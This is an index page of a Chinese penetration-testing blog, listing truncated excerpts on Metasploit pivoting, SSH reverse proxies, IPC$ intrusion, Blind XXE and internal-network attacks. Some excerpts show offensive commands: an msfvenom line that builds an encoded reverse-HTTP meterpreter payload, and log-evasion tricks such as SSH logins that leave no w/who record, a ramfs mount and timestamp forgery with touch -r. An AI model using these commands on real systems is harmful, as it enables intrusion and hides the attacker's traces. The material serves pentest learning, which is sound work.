ROOTCLAY

Only when you plant the flowers can you really smell their fragrance.

《Phishing-瞥见网络钓鱼攻击新旧手法》

补天沙龙北京站-360安全嘉年华

议题 这个议题在360安全嘉年华和补天沙龙北京站都有过分享,已经分享到我Github 链接 ...

Pentest Tips

Pentest Tips.

Pentest-and-Development-Tips A collection of pentest and development tips Author: 3gstudent Tips 1. 手动端口探测 nmap的-sV可以探测出服务版本,但有些情况下必须手动探测去验证 使用Wireshark获取响应包未免大材小用,可通过nc简单判断 eg. 对于8001端口,nc连接上去,随便输......
Web

Metasploit

内网代理的个人总结.

总结需要用到的msf技巧 MSF内网渗透 流程 生成Payload: 生成Python msfvenom -p windows/meterpreter/reverse_http LPORT=443 LHOST=IP -e x86/shikata_ga_nai -i 11 -f py -o ~/clay.py 生成Exe msfvenom -p windows/x64/meterpr......
Web

日志清理

日志清理的个人总结.

日志清理与伪造 Linux平台 无w与who记录登录: ssh -T root@172.16.50.166 "/bin/bash -i" 挂载一个内存目录,重启消失,用于存放临时文件。mount -t ramfs ramfs /usr/tmp 系统本来就存在这样的目录/dev/shm这个文件绝对777权限 复制文件时间:touch -r /usr/sbin/sshd ......
Web

SSH如何反向代理稳定穿透内网

内网代理的个人总结.

最近在测试一些站点,总是需要进入到对方内网,而使用的代理工具多为不稳定工具,就连ssh也会断掉,这篇文章分享一下SSH的反向代理,最下面准备啦一个简单的脚本。 这篇文章首发在安全客上http://bobao.360.cn/learning/detail/4234.html 0x01 引言 早期我们可能会采用HTTP Proxy代理,在浏览器上设置下代理服务器的IP、端口、认证账户和密码。......
Web

内网代理

内网代理的个人总结.

总结自己在实际运用过程中遇到的代理总结 0x00 引言 早期我们可能会采用HTTP Proxy代理,在浏览器上设置下代理服务器的IP、端口、认证账户和密码。但有些软件的网络通信数据并不是HTTP协议,就需要寻找其它方法。 SOCKS代理是个不错的解决方案,不管应用层是什么协议,只要是传输层是TCP协议就可以代理。SOCKS代理中最新的协议是SOCKS5。相对SOCKS4作了大幅度的增强。......
Web

一份详尽的IPC$入侵资料

一份详尽的IPC$入侵资料.

转自http://www.xfocus.net/articles/200303/493.html 一 唠叨一下: 网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄. 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(......
Web

ESRC成都站议题分享

ESRC成都站议题分享文档----从SQL注入谈漏洞利用中的OOB.

已经放在啦我的Github上,欢迎大家Star ...
Web

XXE

Blind-XXE复现笔记.

环境准备 Docker 12docker run -d -p 8080:80 -v /Users/rootclay/web/xxe:/var/www/html php:apachedocker run -it -v /Users/rootclay/web/payload:/var/www/html php:apache 12345.├── /Users/rootclay/web/xxe│ ......
Web

内网渗透

转自小组学长内网学习笔记.

Team:Syclover Author:L3m0n 域环境搭建 准备: DC: win2008 DM: win2003 DM: winxp win2008(域控) 1、修改计算机名: 2、配置固定ip: 其中网关设置错误,应该为192.168.206.2,开始默认的网管 3、服务器管理器—角色: 4、配置域服务: dos下面输入dcpromo Ps:这里可能会因为本地admini......
Web